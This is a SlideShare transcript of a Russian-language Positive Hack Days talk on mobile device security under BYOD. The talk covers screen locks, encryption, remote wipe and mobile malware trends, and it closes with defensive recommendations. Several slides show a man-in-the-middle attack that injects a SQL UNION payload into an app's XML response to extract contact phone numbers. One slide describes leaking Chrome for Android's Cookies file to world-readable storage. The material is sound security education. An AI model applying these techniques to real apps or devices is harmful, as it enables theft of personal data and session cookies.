SlideShare a Scribd company logo

Мобильные устройства + BYOD + Критичные данные = ?

Download as PPTX, PDF
Positive Hack Days
Positive Hack Days
1 of 22
Мобильные устройства + BYOD + Критичные данные = ? Артем Чайкин
BYOD Корпоративная почта Внутренние документы Личная переписка
Известные проблемы Физическая безопасность • кражи • потери Программная безопасность • вредоносное ПО • уязвимости в приложениях
Физическая безопасность Механизмы защиты • PIN-to-unlock • Шифрование данных • Удаление данных • Программное блокирование
PIN-to-unlock
Шифрование Android • Full Disk Encryption с версии 3.0 • Нет стандартного API для шифрования данных iOS • Full Disk Encryption, начиная с iPhone 3GS • Аппаратное шифрование • Стандартное API для сторонних приложений
Удаление данных Android • Outlook • Сторонние приложения (Антивирусы и т.п.) • Программный вайп iOS • Outlook • Mobile Device Management (MDM) • Железный вайп
Программное блокирование
Malware Общее количество экземпляров мобильного вредоносного ПО http://www.mcafee.com/us/resources/reports/rp-quarterly-threat-q2-2012.pdf
Malware Что дальше? • рост числа троянов для мобильных платформ • эксплойты, локальные и удаленные • две основные цели: fraud и конфиденциальные данные • максимальная скрытность в системе • минимальные подозрения у пользователя
Уязвимости приложений Небезопасное хранение данных Небезопасная передача данных MiTM атаки Специфичные для мобильных платформ уязвимости
MITM+SQLI POST https://server.com/ HTTP/1.1 action=login& login=test_user& password=S0mEs3cur3_pass
MITM+SQLI 200 OK <xml> <token>blablablabla</token> <userid>1234</userid> </xml>
MITM+SQLI 200 OK <xml> <token>blablablabla</token> <userid>1234</userid> </xml> SELECT lastUpdate FROM profile WHERE userID=‘1234’;
MITM+SQLI POST https://server.com/ HTTP/1.1 lastupdate=1345914732
MITM+SQLI POST https://server.com/ HTTP/1.1 action=login& login=test_user& password=S0mEs3cur3_pass
MITM+SQLI 200 OK <xml> <token>blablablabla</token> <userid> 1234’ and 1=0 union select phone from Contacts-- </userid> </xml>
MITM+SQLI <userid> 1234’ and 1=0 union select phone from Contacts-- </userid> SELECT lastUpdate FROM profile WHERE userID=‘1234’ AND 1=0 UNION SELECT phone FROM Сontacts– ‘;
MITM+SQLI POST https://server.com/ HTTP/1.1 lastupdate=+71234567890
Chrome for Android http://, https://, file:// Cookies и История браузера в SQLITE БД Автоматическая загрузка бинарных файлов Файлы браузера не доступны стороннему ПО file:///data/data/com.android.chrome/databases/Cookies Файл Cookies будет скопирован в папку /sdcard/ и доступен на чтением всем.
Выводы Сложный пароль для PIN-to-unlock Полное шифрование системы Антивирусы и механизмы удаления данных Устанавливать только доверенное ПО BYOD – плохо!
Спасибо за внимание! @a_chaykin achaykin@ptsecurity.ru

Recommended

DLP in global view - RUSSIAN
DLP in global view - RUSSIANDLP in global view - RUSSIAN
DLP in global view - RUSSIANKirill Kertsenbaum
 
Вебинар. Построение защиты виртуальной инфраструктуры
Вебинар. Построение защиты виртуальной инфраструктурыВебинар. Построение защиты виртуальной инфраструктуры
Вебинар. Построение защиты виртуальной инфраструктурыLETA IT-company
 
Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...
Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...
Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...SelectedPresentations
 
текстовый документ Open document
текстовый документ Open documentтекстовый документ Open document
текстовый документ Open documentAirat Yusupov
 
Демонстрация комплексной системы контроля проводного и беспроводного доступа ...
Демонстрация комплексной системы контроля проводного и беспроводного доступа ...Демонстрация комплексной системы контроля проводного и беспроводного доступа ...
Демонстрация комплексной системы контроля проводного и беспроводного доступа ...SelectedPresentations
 
Аутентификация
АутентификацияАутентификация
АутентификацияElena_dm
 
Денис Калемберг (Safe tech) - Делаем безопасность клиента прибыльной для банка
Денис Калемберг (Safe tech) - Делаем безопасность клиента прибыльной для банка Денис Калемберг (Safe tech) - Делаем безопасность клиента прибыльной для банка
Денис Калемберг (Safe tech) - Делаем безопасность клиента прибыльной для банка Expolink
 
Электронная аутентификация в государственных системах
Электронная аутентификация в государственных системахЭлектронная аутентификация в государственных системах
Электронная аутентификация в государственных системахMikhail Vanin
 

Recommended

DLP in global view - RUSSIAN
DLP in global view - RUSSIANDLP in global view - RUSSIAN
DLP in global view - RUSSIANKirill Kertsenbaum
 
Вебинар. Построение защиты виртуальной инфраструктуры
Вебинар. Построение защиты виртуальной инфраструктурыВебинар. Построение защиты виртуальной инфраструктуры
Вебинар. Построение защиты виртуальной инфраструктурыLETA IT-company
 
Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...
Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...
Fraud-мониторинг для ДБО. Повышение эффективности и противостояние угрозам ба...SelectedPresentations
 
текстовый документ Open document
текстовый документ Open documentтекстовый документ Open document
текстовый документ Open documentAirat Yusupov
 
Демонстрация комплексной системы контроля проводного и беспроводного доступа ...
Демонстрация комплексной системы контроля проводного и беспроводного доступа ...Демонстрация комплексной системы контроля проводного и беспроводного доступа ...
Демонстрация комплексной системы контроля проводного и беспроводного доступа ...SelectedPresentations
 
Аутентификация
АутентификацияАутентификация
АутентификацияElena_dm
 
Денис Калемберг (Safe tech) - Делаем безопасность клиента прибыльной для банка
Денис Калемберг (Safe tech) - Делаем безопасность клиента прибыльной для банка Денис Калемберг (Safe tech) - Делаем безопасность клиента прибыльной для банка
Денис Калемберг (Safe tech) - Делаем безопасность клиента прибыльной для банка Expolink
 
Электронная аутентификация в государственных системах
Электронная аутентификация в государственных системахЭлектронная аутентификация в государственных системах
Электронная аутентификация в государственных системахMikhail Vanin
 
Защита корпоративных и персональных мобильных устройств в сети
Защита корпоративных и персональных мобильных устройств в сетиЗащита корпоративных и персональных мобильных устройств в сети
Защита корпоративных и персональных мобильных устройств в сетиCisco Russia
 
Uisg itgov 7_top10
Uisg itgov 7_top10Uisg itgov 7_top10
Uisg itgov 7_top10uisgslide
 
Uisg itgov 7_top10
Uisg itgov 7_top10Uisg itgov 7_top10
Uisg itgov 7_top10uisgslide
 
Как взломать вашу компанию в 3 клика
Как взломать вашу компанию в 3 кликаКак взломать вашу компанию в 3 клика
Как взломать вашу компанию в 3 кликаVitaliy Yakushev
 
Угрозы ИБ мобильным устройствам (2014)
Угрозы ИБ мобильным устройствам (2014)Угрозы ИБ мобильным устройствам (2014)
Угрозы ИБ мобильным устройствам (2014)Alexey Kachalin
 
Mob sec
Mob secMob sec
Mob secEllada
 
Архитектура защищенного периметра
Архитектура защищенного периметраАрхитектура защищенного периметра
Архитектура защищенного периметраCisco Russia
 
12 причин хорошего SOC
12 причин хорошего SOC12 причин хорошего SOC
12 причин хорошего SOCDenis Batrankov, CISSP
 
Softline: Информационная безопасность
Softline: Информационная безопасностьSoftline: Информационная безопасность
Softline: Информационная безопасностьSoftline
 
Device lock (code-ib пермь)
Device lock (code-ib пермь) Device lock (code-ib пермь)
Device lock (code-ib пермь)Expolink
 
Подход CTI к информационной безопасности бизнеса, Максим Лукин
Подход CTI к информационной безопасности бизнеса, Максим ЛукинПодход CTI к информационной безопасности бизнеса, Максим Лукин
Подход CTI к информационной безопасности бизнеса, Максим ЛукинYulia Sedova
 
Архитектура NaaS\NaaE_ИТ-Интегратор_Cisco_Аваль
Архитектура NaaS\NaaE_ИТ-Интегратор_Cisco_АвальАрхитектура NaaS\NaaE_ИТ-Интегратор_Cisco_Аваль
Архитектура NaaS\NaaE_ИТ-Интегратор_Cisco_АвальIT-Integrator
 
Device lock 7 2013 code ib нн
Device lock 7 2013 code ib ннDevice lock 7 2013 code ib нн
Device lock 7 2013 code ib ннExpolink
 
Система управления учетными записями (IDM). Информационная безопасность.
Система управления учетными записями (IDM). Информационная безопасность. Система управления учетными записями (IDM). Информационная безопасность.
Система управления учетными записями (IDM). Информационная безопасность. Softline
 
Управление инцидентами информационной безопасности с помощью DLP Solar Dozor
Управление инцидентами информационной безопасности с помощью DLP Solar DozorУправление инцидентами информационной безопасности с помощью DLP Solar Dozor
Управление инцидентами информационной безопасности с помощью DLP Solar DozorSolar Security
 
пр Управление инцидентами ИБ (Dozor) v.2.1
пр Управление инцидентами ИБ (Dozor) v.2.1пр Управление инцидентами ИБ (Dozor) v.2.1
пр Управление инцидентами ИБ (Dozor) v.2.1Andrey Prozorov, CISM, CIPP/E, CDPSE. LA 27001
 
McAfee Enterprise Mobility Management 11
McAfee Enterprise Mobility Management 11McAfee Enterprise Mobility Management 11
McAfee Enterprise Mobility Management 11Vladyslav Radetsky
 
Check Point
Check PointCheck Point
Check PointExpolink
 
Check point
Check pointCheck point
Check pointExpolink
 
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Denis Batrankov, CISSP
 
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 

More Related Content

Similar to Мобильные устройства + BYOD + Критичные данные = ?

Защита корпоративных и персональных мобильных устройств в сети
Защита корпоративных и персональных мобильных устройств в сетиЗащита корпоративных и персональных мобильных устройств в сети
Защита корпоративных и персональных мобильных устройств в сетиCisco Russia
 
Uisg itgov 7_top10
Uisg itgov 7_top10Uisg itgov 7_top10
Uisg itgov 7_top10uisgslide
 
Uisg itgov 7_top10
Uisg itgov 7_top10Uisg itgov 7_top10
Uisg itgov 7_top10uisgslide
 
Как взломать вашу компанию в 3 клика
Как взломать вашу компанию в 3 кликаКак взломать вашу компанию в 3 клика
Как взломать вашу компанию в 3 кликаVitaliy Yakushev
 
Угрозы ИБ мобильным устройствам (2014)
Угрозы ИБ мобильным устройствам (2014)Угрозы ИБ мобильным устройствам (2014)
Угрозы ИБ мобильным устройствам (2014)Alexey Kachalin
 
Архитектура защищенного периметра
Архитектура защищенного периметраАрхитектура защищенного периметра
Архитектура защищенного периметраCisco Russia
 
Softline: Информационная безопасность
Softline: Информационная безопасностьSoftline: Информационная безопасность
Softline: Информационная безопасностьSoftline
 
Device lock (code-ib пермь)
Device lock (code-ib пермь) Device lock (code-ib пермь)
Device lock (code-ib пермь)Expolink
 
Подход CTI к информационной безопасности бизнеса, Максим Лукин
Подход CTI к информационной безопасности бизнеса, Максим ЛукинПодход CTI к информационной безопасности бизнеса, Максим Лукин
Подход CTI к информационной безопасности бизнеса, Максим ЛукинYulia Sedova
 
Архитектура NaaS\NaaE_ИТ-Интегратор_Cisco_Аваль
Архитектура NaaS\NaaE_ИТ-Интегратор_Cisco_АвальАрхитектура NaaS\NaaE_ИТ-Интегратор_Cisco_Аваль
Архитектура NaaS\NaaE_ИТ-Интегратор_Cisco_АвальIT-Integrator
 
Device lock 7 2013 code ib нн
Device lock 7 2013 code ib ннDevice lock 7 2013 code ib нн
Device lock 7 2013 code ib ннExpolink
 
Система управления учетными записями (IDM). Информационная безопасность.
Система управления учетными записями (IDM). Информационная безопасность. Система управления учетными записями (IDM). Информационная безопасность.
Система управления учетными записями (IDM). Информационная безопасность. Softline
 
Управление инцидентами информационной безопасности с помощью DLP Solar Dozor
Управление инцидентами информационной безопасности с помощью DLP Solar DozorУправление инцидентами информационной безопасности с помощью DLP Solar Dozor
Управление инцидентами информационной безопасности с помощью DLP Solar DozorSolar Security
 
McAfee Enterprise Mobility Management 11
McAfee Enterprise Mobility Management 11McAfee Enterprise Mobility Management 11
McAfee Enterprise Mobility Management 11Vladyslav Radetsky
 
Check Point
Check PointCheck Point
Check PointExpolink
 
Check point
Check pointCheck point
Check pointExpolink
 
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Denis Batrankov, CISSP
 

Similar to Мобильные устройства + BYOD + Критичные данные = ? (20)

Защита корпоративных и персональных мобильных устройств в сети
Защита корпоративных и персональных мобильных устройств в сетиЗащита корпоративных и персональных мобильных устройств в сети
Защита корпоративных и персональных мобильных устройств в сети
 
Uisg itgov 7_top10
Uisg itgov 7_top10Uisg itgov 7_top10
Uisg itgov 7_top10
 
Uisg itgov 7_top10
Uisg itgov 7_top10Uisg itgov 7_top10
Uisg itgov 7_top10
 
Как взломать вашу компанию в 3 клика
Как взломать вашу компанию в 3 кликаКак взломать вашу компанию в 3 клика
Как взломать вашу компанию в 3 клика
 
Угрозы ИБ мобильным устройствам (2014)
Угрозы ИБ мобильным устройствам (2014)Угрозы ИБ мобильным устройствам (2014)
Угрозы ИБ мобильным устройствам (2014)
 
Mob sec
Mob secMob sec
Mob sec
 
Архитектура защищенного периметра
Архитектура защищенного периметраАрхитектура защищенного периметра
Архитектура защищенного периметра
 
12 причин хорошего SOC
12 причин хорошего SOC12 причин хорошего SOC
12 причин хорошего SOC
 
Softline: Информационная безопасность
Softline: Информационная безопасностьSoftline: Информационная безопасность
Softline: Информационная безопасность
 
Device lock (code-ib пермь)
Device lock (code-ib пермь) Device lock (code-ib пермь)
Device lock (code-ib пермь)
 
Подход CTI к информационной безопасности бизнеса, Максим Лукин
Подход CTI к информационной безопасности бизнеса, Максим ЛукинПодход CTI к информационной безопасности бизнеса, Максим Лукин
Подход CTI к информационной безопасности бизнеса, Максим Лукин
 
Архитектура NaaS\NaaE_ИТ-Интегратор_Cisco_Аваль
Архитектура NaaS\NaaE_ИТ-Интегратор_Cisco_АвальАрхитектура NaaS\NaaE_ИТ-Интегратор_Cisco_Аваль
Архитектура NaaS\NaaE_ИТ-Интегратор_Cisco_Аваль
 
Device lock 7 2013 code ib нн
Device lock 7 2013 code ib ннDevice lock 7 2013 code ib нн
Device lock 7 2013 code ib нн
 
Система управления учетными записями (IDM). Информационная безопасность.
Система управления учетными записями (IDM). Информационная безопасность. Система управления учетными записями (IDM). Информационная безопасность.
Система управления учетными записями (IDM). Информационная безопасность.
 
Управление инцидентами информационной безопасности с помощью DLP Solar Dozor
Управление инцидентами информационной безопасности с помощью DLP Solar DozorУправление инцидентами информационной безопасности с помощью DLP Solar Dozor
Управление инцидентами информационной безопасности с помощью DLP Solar Dozor
 
пр Управление инцидентами ИБ (Dozor) v.2.1
пр Управление инцидентами ИБ (Dozor) v.2.1пр Управление инцидентами ИБ (Dozor) v.2.1
пр Управление инцидентами ИБ (Dozor) v.2.1
 
McAfee Enterprise Mobility Management 11
McAfee Enterprise Mobility Management 11McAfee Enterprise Mobility Management 11
McAfee Enterprise Mobility Management 11
 
Check Point
Check PointCheck Point
Check Point
 
Check point
Check pointCheck point
Check point
 
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
Какие вопросы чаще всего задают вендору при выборе решения по информационной ...
 

More from Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

More from Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Мобильные устройства + BYOD + Критичные данные = ?

  • 1. Мобильные устройства + BYOD + Критичные данные = ? Артем Чайкин
  • 2. BYOD Корпоративная почта Внутренние документы Личная переписка
  • 3. Известные проблемы Физическая безопасность • кражи • потери Программная безопасность • вредоносное ПО • уязвимости в приложениях
  • 4. Физическая безопасность Механизмы защиты • PIN-to-unlock • Шифрование данных • Удаление данных • Программное блокирование
  • 6. Шифрование Android • Full Disk Encryption с версии 3.0 • Нет стандартного API для шифрования данных iOS • Full Disk Encryption, начиная с iPhone 3GS • Аппаратное шифрование • Стандартное API для сторонних приложений
  • 7. Удаление данных Android • Outlook • Сторонние приложения (Антивирусы и т.п.) • Программный вайп iOS • Outlook • Mobile Device Management (MDM) • Железный вайп
  • 9. Malware Общее количество экземпляров мобильного вредоносного ПО http://www.mcafee.com/us/resources/reports/rp-quarterly-threat-q2-2012.pdf
  • 10. Malware Что дальше? • рост числа троянов для мобильных платформ • эксплойты, локальные и удаленные • две основные цели: fraud и конфиденциальные данные • максимальная скрытность в системе • минимальные подозрения у пользователя
  • 11. Уязвимости приложений Небезопасное хранение данных Небезопасная передача данных MiTM атаки Специфичные для мобильных платформ уязвимости
  • 12. MITM+SQLI POST https://server.com/ HTTP/1.1 action=login& login=test_user& password=S0mEs3cur3_pass
  • 13. MITM+SQLI 200 OK <xml> <token>blablablabla</token> <userid>1234</userid> </xml>
  • 14. MITM+SQLI 200 OK <xml> <token>blablablabla</token> <userid>1234</userid> </xml> SELECT lastUpdate FROM profile WHERE userID=‘1234’;
  • 15. MITM+SQLI POST https://server.com/ HTTP/1.1 lastupdate=1345914732
  • 16. MITM+SQLI POST https://server.com/ HTTP/1.1 action=login& login=test_user& password=S0mEs3cur3_pass
  • 17. MITM+SQLI 200 OK <xml> <token>blablablabla</token> <userid> 1234’ and 1=0 union select phone from Contacts-- </userid> </xml>
  • 18. MITM+SQLI <userid> 1234’ and 1=0 union select phone from Contacts-- </userid> SELECT lastUpdate FROM profile WHERE userID=‘1234’ AND 1=0 UNION SELECT phone FROM Сontacts– ‘;
  • 19. MITM+SQLI POST https://server.com/ HTTP/1.1 lastupdate=+71234567890
  • 20. Chrome for Android http://, https://, file:// Cookies и История браузера в SQLITE БД Автоматическая загрузка бинарных файлов Файлы браузера не доступны стороннему ПО file:///data/data/com.android.chrome/databases/Cookies Файл Cookies будет скопирован в папку /sdcard/ и доступен на чтением всем.
  • 21. Выводы Сложный пароль для PIN-to-unlock Полное шифрование системы Антивирусы и механизмы удаления данных Устанавливать только доверенное ПО BYOD – плохо!
  • 22. Спасибо за внимание! @a_chaykin achaykin@ptsecurity.ru